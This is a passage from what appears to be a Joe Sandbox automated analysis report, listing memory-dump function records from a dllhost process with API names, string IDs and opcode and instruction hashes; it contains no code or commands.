                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                          • Instruction ID: 8fac3616576438d4a371d171cc21054ce729d59a4653c34b582e9d6063f63b08
                          • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                          • Instruction Fuzzy Hash: B751C53661EB018FE364DB16E488A5AB3A4F788BA4F524129ED4F43B55DF38C9C5CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                          • Instruction ID: 70447b91329011702e9d5b61e66da4d143c3854abc66492ed610b5721cbae26e
                          • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                          • Instruction Fuzzy Hash: 6451C73531A7418FE724CF2AE888B5A73A4F789BA4F525129DE4E53B55DF38C885CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                          • Instruction ID: e5f2bad78e3e0c64387f0d35f648c8eb22aa6f9f7f6c5f1725bfb276e92fad7f
                          • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                          • Instruction Fuzzy Hash: CD51B53661A7418FE764CF16E888B1AB3A5F788BA4F524529DE4E43B54DF38C985CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                          • Instruction ID: 7ab57c4806f8a308aa4bdec5b6d24676d1986f0d371fc485244f0e12989f37ac
                          • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                          • Instruction Fuzzy Hash: C261B53652EB84CBEB60CB59E45871AB7A0F388764F110516FE8E57BA8DB7CC580CB01
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                          • Instruction ID: 7c6f1216dde9188cd47ccb83dec8ef758ab0cff4829f7ea3ae75dec3653f75e1
                          • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                          • Instruction Fuzzy Hash: DA61947752EB448AEB60CB55E45875EB7A0F388764F120116FE8E87BA8DB7CC584CB04
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 1092925422-0
                          • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                          • Instruction ID: eaaf1c3f9098413e96af13e18b36c163efac7514f92c8c77b61d29bf5d674bce
                          • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                          • Instruction Fuzzy Hash: F111913661AB4187EB348F21F40860AB7B0FB49BA4F454426DE4D137A4EF7EC984C781
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 1092925422-0
                          • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                          • Instruction ID: e402ea35cefb601bed9d4e8627f155cbf3d71ec08f3b7342e724c225c7313386
                          • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                          • Instruction Fuzzy Hash: F711422661E740D7EB648B25E40861AA7B0FB49B90F050426EE4D47B94EF7DC994C784
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                          • String ID: csm
                          • API String ID: 2395640692-1018135373
                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                          • Instruction ID: 8b71f35d19494b33a445c1d17dc364d0c1092fb549f2c54591a07a677fe5de71
                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                          • Instruction Fuzzy Hash: 3A517F3231B7008FEB54DB25E488B6D7792F754BA8F568125EE4E5B788EB79C881C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                          • String ID: csm
                          • API String ID: 2395640692-1018135373
                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                          • Instruction ID: 25be796fe9dfcf1381ddea103d102a7efa3874367b6f83ab676a4bf16a7b9539
                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                          • Instruction Fuzzy Hash: B0516E3331AB00CEEB54DB25E548B6D7791F754BA8F168125EE5E4BB88DB79C881C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000003.1886521218.00000279A9240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000279A9240000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_3_279a9240000_dllhost.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                          • Instruction ID: 244f54b5bd5363a61610e8202353964cba107cdb462eb8ef2d498c3cf1bf1aca
                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                          • Instruction Fuzzy Hash: 1D517C3624B7808EEB748F22954C35877A0F394BA4F1A9116DE9D4BBD9CB39D8D0CB01
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                          • Instruction ID: 6b164ed33f18a9e0071e6dc65bbd8dc4fbca6aa5312ba561064b5cd3fc369059
                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                          • Instruction Fuzzy Hash: F0518A3620A7809FEB748F22954835977A5F364BB4F1A511ADE8D67BD5CB38C8D0CB01
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: CallEncodePointerTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3544855599-2084237596
                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                          • Instruction ID: 06e670e532f30fe7ad91f001f83f8bc83a3716b482001c52586b6247424c1478
                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                          • Instruction Fuzzy Hash: DB619D7250ABC4C9EB208F25E4457AEB7A0F785BA8F054215EF9C23B99DB78C1D0CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                          • Instruction ID: 222beb753db21134563c9ce8c42b0e777e0472e318e3e0708414b6b295ba4ad0
                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                          • Instruction Fuzzy Hash: 7C51593720A7808FEB748F26954835877A6FB64BA4F164116DE9D47F95CB38C8D0CB01
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: CallEncodePointerTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3544855599-2084237596
                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                          • Instruction ID: 02da3923c6e7bfce1e1af57438eaf8e3685984627ab912723c4dd5498e50d908
                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                          • Instruction Fuzzy Hash: DE618A7350ABC48AEB218F16E44479AB7A0FB85BA8F054215EF9D17B99DB78C1D4CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                          • String ID: pid_
                          • API String ID: 517849248-4147670505
                          • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                          • Instruction ID: 995058eb15705748f7afdfcd5a2e9ffb1d2b47039ebbe6b460fd3a7529799025
                          • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                          • Instruction Fuzzy Hash: E611E62131A78195FB209B35F84939A63A4FB887A0F824035AE4DF36D5FF39C885C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                          • String ID: pid_
                          • API String ID: 517849248-4147670505
                          • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                          • Instruction ID: b2d68acdf53505bbdc7da28a85750bcbb1ac9de27ca90ddaa4912cde66202901
                          • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                          • Instruction Fuzzy Hash: 4B11D32231A79196FB209B25E84D35A63A4F7887A0F8240319E4EC3B96EF39C885C700
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: FileWrite$ConsoleErrorLastOutput
                          • String ID:
                          • API String ID: 2718003287-0
                          • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                          • Instruction ID: 2af90100dd6de451e7c2e76626d9debf4f77181eda58217de52151396977511f
                          • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                          • Instruction Fuzzy Hash: 66D1DF3271AB948DE711CFA5D4486DC37B1F364BE8F418216DE5EA7B99DA34C18AC340
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: FileWrite$ConsoleErrorLastOutput
                          • String ID:
                          • API String ID: 2718003287-0
                          • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                          • Instruction ID: f00fb853e8f828f0a0b94449190da49b7f639791d49fe1cdc8f970d47dadf1ad
                          • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                          • Instruction Fuzzy Hash: CDD1E03271AB848DE711CFA5D4487DC3BB1F365BA8F464216CE5EA7B99DA34C18AC340
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$Process$Free
                          • String ID:
                          • API String ID: 3168794593-0
                          • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                          • Instruction ID: eb91298f0844cba6d47964c804b31a37dedf7010821e5d11d5817eed31deb4e1
                          • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                          • Instruction Fuzzy Hash: 3801883661AB80DEE714DF66E80864977A0F788F90F4A8025DF4D53728EF38D091C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$Process$Free
                          • String ID:
                          • API String ID: 3168794593-0
                          • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                          • Instruction ID: 601f73c1f7bfd714ad61f41db4d6ef9be829acc90dce26f4616785bc4875f19b
                          • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                          • Instruction Fuzzy Hash: BB01653662AB80DAE714DF66E80864977E4F788FA0B0A4025DF4E47B28DF38D092C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$Process$Free
                          • String ID:
                          • API String ID: 3168794593-0
                          • Opcode ID: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
                          • Instruction ID: 5a1011d9486e765d7ba40cc25435cd7167fae03bd1d0927e1cf3db12c06e0eeb
                          • Opcode Fuzzy Hash: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
                          • Instruction Fuzzy Hash: 2A0132B2610A808AE705EF67B80438977A0F78CFC0F4A4525FB5953B39CE38D091C744
                          APIs
                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000279A92828DF), ref: 00000279A9282A12
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: ConsoleMode
                          • String ID:
                          • API String ID: 4145635619-0
                          • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                          • Instruction ID: 9bf9b91e7fd74c363c5352579e96ae4d8e85a1fed9cc369fd7c9a4f8862c6d3e
                          • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
